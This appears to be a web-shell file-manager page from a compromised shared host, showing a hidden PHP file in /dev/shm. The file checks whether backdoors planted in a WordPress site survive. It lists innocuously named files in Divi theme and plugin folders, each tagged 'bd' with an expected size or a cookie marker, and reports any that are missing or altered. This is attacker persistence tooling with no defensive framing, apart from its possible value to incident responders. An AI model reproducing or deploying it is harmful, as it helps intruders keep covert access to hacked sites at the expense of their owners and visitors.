HEX
Server: LiteSpeed
System: Linux server111.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User: lacammxy (848)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //dev/shm/.pointer
<?php   $r = '/home/hpergfvc/public_html'; $x = ["/wp-content/plugins/all-in-one-wp-migration/lib/vendor/bandar/bandar/lib/MySQLStore.php"=>"bd@@1256202@@826",
"/wp-content/themes/Divi/includes/builder/module/woocommerce/xoops_version.php"=>"bd@@1256205@@921",
"/wp-content/themes/Divi/core/components/api/newannounce.php"=>"bd@@1256208@@840",
"/wp-content/themes/Divi/core/components/post/4.php"=>"bd@@1256210@@863",
"/wp-content/themes/Divi/includes/builder/module/field/display-conditions/Message.php"=>"bd@@1256572@@1016",
"/wp-content/themes/Divi/core/code-snippets/post/type/ccval.php"=>"bd@@1256579@@877",
"/wp-content/themes/Divi/includes/builder/post/type/MinSize.php"=>"bd@@1256583@@960",
"/wp-content/themes/Divi/epanel/theme-options-library/theme-options-library-local/intro.php"=>"bd@@1256587@@947",
"/index.php"=>"bd@@582795@@405",
"/wp-content/plugins/all-in-one-wp-migration/lib/view/import/button.ftp.php"=>"bd@@1256592@@899",
"/wp-content/plugins/better-search-replace/includes/class-bsr-utils.php"=>"bd@@528529@@_COOKIE[3]",
"/wp-content/plugins/seo_1756468779/archlve.php"=>"bd@@526801@@925",
"/wp-content/themes/Divi/includes/builder/feature/gutenberg/utils/index~.php"=>"bd@@1256197@@1028"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');